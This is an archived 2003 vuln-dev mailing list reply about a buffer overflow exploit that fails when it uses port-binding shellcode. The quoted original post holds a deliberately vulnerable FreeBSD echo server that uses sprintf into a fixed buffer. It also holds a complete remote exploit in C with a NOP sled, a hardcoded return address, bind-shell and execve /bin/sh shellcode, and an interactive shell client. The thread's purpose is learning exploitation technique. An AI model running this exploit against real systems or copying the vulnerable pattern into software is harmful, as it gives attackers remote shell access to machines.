Re: sample buffer overflow exploit problem

• Previous message: deepcode .: "Re: sample buffer overflow exploit problem"
• In reply to: deepcode .: "Re: sample buffer overflow exploit problem"
• Next in thread: Ganbold: "Re: sample buffer overflow exploit problem"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Sun, 28 Sep 2003 15:06:29 +0900
To: "deepcode ." <pondermate@hotmail.com>

I don't know exactly what's wrong, but I suspect there might be a problem
with shellcode.
I tried to connect from different host and it is not working, the same
problem, connection drops.

Ganbold

At 11:37 PM 9/27/2003 -0300, you wrote:

>You say that you can connect after the exploit, but then the connection
>gets dropped immediately afterwards... is there a firewall in place?
>
>>From: Ganbold <ganbold@micom.mng.net>
>>To: vuln-dev@securityfocus.com
>>Subject: sample buffer overflow exploit problem
>>Date: Sat, 27 Sep 2003 16:54:59 +0900
>>
>>Hi,
>>
>>I'm very new to buffer overflow exploit technics and my boss wants me to
>>thoroughly understand
>>how it works. I'm trying to exploit sample network server in FreeBSD 5.1
>>for this purpose.
>>When I try to exploit using execve /bin/sh (shellcode1), it works and
>>launches the shell in the remote machine.
>>However when I try to use port binding shell code, it binds shell to the
>>port, but when I try to connect to
>>it, it just closes the connection. Also I can't connect to bind port
>>after sending buffer using following code snippets:
>>..............
>> printf("[-] Connecting to bindshell...\n");
>> remote.sin_family = AF_INET;
>> remote.sin_addr = *((struct in_addr *)host->h_addr);
>> remote.sin_port = htons(12345);
>> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
>> {
>> close(s);
>> fprintf(stderr, "Error: connect\n");
>> return -1;
>> }
>> exec_sh(s);
>>...............
>>
>>I appreciate if somebody give me some help to solve this test problem.
>>Is there anywhere I can find detailed explanation about buffer overflows
>>and working sample network exploits?
>>Is there anyway I can generate shellcodes in FreeBSD?
>>
>>I attached my sample server code and exploit code.
>>
>>thanks in advance,
>>
>>Ganbold Ts,
>>
>>senior programmer,
>>Micom Co., Ltd
>>Ulaanbaatar,
>>Mongolia
>>
>>
>>
>>Following is network server code:
>>--------------------------------------------------------------------------------------------------------------------------------
>>#include <stdio.h>
>>#include <netinet/in.h>
>>#include <netdb.h>
>>#include <sys/socket.h>
>>#include <sys/types.h>
>>#include <errno.h>
>>
>>#define BUFFER_SIZE 1024
>>#define NAME_SIZE 2048
>>
>>int handle(int c)
>>{
>> char buffer[BUFFER_SIZE], name[NAME_SIZE];
>> int bytes;
>> strcpy(buffer, "Your name?: ");
>> bytes = send(c, buffer, strlen(buffer), 0);
>> if (bytes == -1)
>> return -1;
>> bytes = recv(c, name, sizeof(name), 0);
>> if (bytes == -1)
>> return -1;
>> name[bytes - 1] = '\0';
>> sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
>> bytes = send(c, buffer, strlen(buffer), 0);
>> if (bytes == -1)
>> return -1;
>> return 0;
>>}
>>
>>
>>int main(int argc, char *argv[])
>>{
>> int s, c, cli_size;
>> struct sockaddr_in srv, cli;
>> if (argc != 2)
>> {
>> fprintf(stderr, "usage: %s port\n", argv[0]);
>> return 1;
>> }
>> s = socket(AF_INET, SOCK_STREAM, 0);
>> if (s == -1)
>> {
>> perror("socket() failed");
>> return 2;
>> }
>> srv.sin_addr.s_addr = INADDR_ANY;
>> srv.sin_port = htons( (unsigned short int) atol(argv[1]));
>> srv.sin_family = AF_INET;
>> if (bind(s, &srv, sizeof(srv)) == -1)
>> {
>> perror("bind() failed");
>> return 3;
>> }
>> if (listen(s, 3) == -1)
>> {
>> perror("listen() failed");
>> return 4;
>> }
>> for(;;)
>> {
>> c = accept(s, &cli, &cli_size);
>> if (c == -1)
>> {
>> perror("accept() failed");
>> return 5;
>> }
>> fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr));
>> if (handle(c) == -1)
>> fprintf(stderr, "%s: handle() failed", argv[0]);
>> close(c);
>> }
>> return 0;
>>}
>>--------------------------------------------------------------------------------------------------------------------------------
>>
>>Following is the sample exploit code:
>>--------------------------------------------------------------------------------------------------------------------------------
>>#include <stdio.h>
>>#include <netinet/in.h>
>>#include <netdb.h>
>>#include <sys/socket.h>
>>#include <sys/types.h>
>>#include <errno.h>
>>#include <unistd.h>
>>
>>/*
>> * FreeBSD shellcode - binds /bin/sh to a port 12345
>> *
>> * Claes M. Nyberg 20020619
>> *
>> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
>> */
>>char shellcode[] = /* port _______*/
>>
>>"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
>>
>>"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
>>
>>"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
>>
>>"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
>>
>>"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
>>
>>"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
>>
>>"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
>> "\x40\x50\x50\xcd\x80";
>>
>>/*
>> * FreeBSD shellcode - execve /bin/sh
>> *
>> * Claes M. Nyberg 20020120
>> *
>> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
>> */
>>char shellcode1[] =
>> "\x31\xc0" /* xorl %eax, %eax */
>> "\x50" /* pushl %eax */
>> "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
>> "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
>> "\x89\xe3" /* movl %esp, %ebx */
>> "\x50" /* pushl %eax */
>> "\x53" /* pushl %ebx */
>> "\x89\xe2" /* movl %esp, %edx */
>> "\x50" /* pushl %eax */
>> "\x52" /* pushl %edx */
>> "\x53" /* pushl %ebx */
>> "\x50" /* pushl %eax */
>> "\xb0\x3b" /* movb $0x3b, %al */
>> "\xcd\x80" /* int $0x80 */
>> "\x31\xc0" /* xorl %eax, %eax */
>> "\x40" /* inc %eax */
>> "\x50" /* pushl %eax */
>> "\x50" /* pushl %eax */
>> "\xcd\x80"; /* int $0x80 */
>>
>>#define RET 0xbfbffa48
>>
>>int exec_sh(int sockfd)
>>{
>> char snd[4096],rcv[4096];
>> fd_set rset;
>> while(1)
>> {
>> FD_ZERO(&rset);
>> FD_SET(fileno(stdin),&rset);
>> FD_SET(sockfd,&rset);
>> select(255,&rset,NULL,NULL,NULL);
>> if(FD_ISSET(fileno(stdin),&rset))
>> {
>> memset(snd,0,sizeof(snd));
>> fgets(snd,sizeof(snd),stdin);
>> write(sockfd,snd,strlen(snd));
>> }
>> if(FD_ISSET(sockfd,&rset))
>> {
>> memset(rcv,0,sizeof(rcv));
>> if(read(sockfd,rcv,sizeof(rcv))<=0)
>> exit(0);
>> fputs(rcv,stdout);
>> }
>> }
>>}
>>
>>int main(int argc, char *argv[]) {
>>
>> char buffer[1064];
>> int s,t, i, size;
>> struct sockaddr_in remote;
>> struct hostent *host;
>>
>> if(argc != 3) {
>> printf("Usage: %s target-ip port\n", argv[0]);
>> return -1;
>> }
>>
>> // filling buffer with NOPs
>> memset(buffer, 0x90, 1064);
>>
>> //copying shellcode into buffer
>> memcpy(buffer+1001-sizeof(shellcode) , shellcode,
>> sizeof(shellcode));
>>
>> // the previous statement causes a unintential Nullbyte at
>> buffer[1000]
>> buffer[1000] = 0x90;
>>
>> // Copying the return address multiple times at the end of the
>> buffer...
>> for(i=1022; i < 1059; i+=4) {
>> * ((int *) &buffer[i]) = RET;
>> }
>>
>> buffer[1063] = 0x0;
>>
>> //getting hostname
>>
>> host=gethostbyname(argv[1]);
>> if (host==NULL)
>> {
>> fprintf(stderr, "Unknown Host %s\n",argv[1]);
>> return -1;
>> }
>>
>> // creating socket...
>> s = socket(AF_INET, SOCK_STREAM, 0);
>> if (s < 0)
>> {
>> fprintf(stderr, "Error: Socket\n");
>> return -1;
>> }
>> remote.sin_family = AF_INET;
>> remote.sin_addr = *((struct in_addr *)host->h_addr);
>> remote.sin_port = htons(atoi(argv[2]));
>> // connecting with destination host
>> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
>> {
>> close(s);
>> fprintf(stderr, "Error: connect\n");
>> return -1;
>> }
>> //sending exploit string
>> size = send(s, buffer, sizeof(buffer), 0);
>> if (size==-1)
>> {
>> close(s);
>> fprintf(stderr, "sending data failed\n");
>> return -1;
>> }
>>/*
>> printf("[-] Connecting to bindshell...\n");
>> remote.sin_family = AF_INET;
>> remote.sin_addr = *((struct in_addr *)host->h_addr);
>> remote.sin_port = htons(12345);
>> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
>> {
>> close(s);
>> fprintf(stderr, "Error: connect\n");
>> return -1;
>> }
>> exec_sh(s);
>>*/
>> // closing socket
>> close(s);
>>}
>>
>>--------------------------------------------------------------------------------------------------------------------------------
>>
>>
>
>_________________________________________________________________
>STOP MORE SPAM with the new MSN 8 and get 2 months FREE*
>http://join.msn.com/?page=features/junkmail
>
>

• Previous message: deepcode .: "Re: sample buffer overflow exploit problem"
• In reply to: deepcode .: "Re: sample buffer overflow exploit problem"
• Next in thread: Ganbold: "Re: sample buffer overflow exploit problem"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]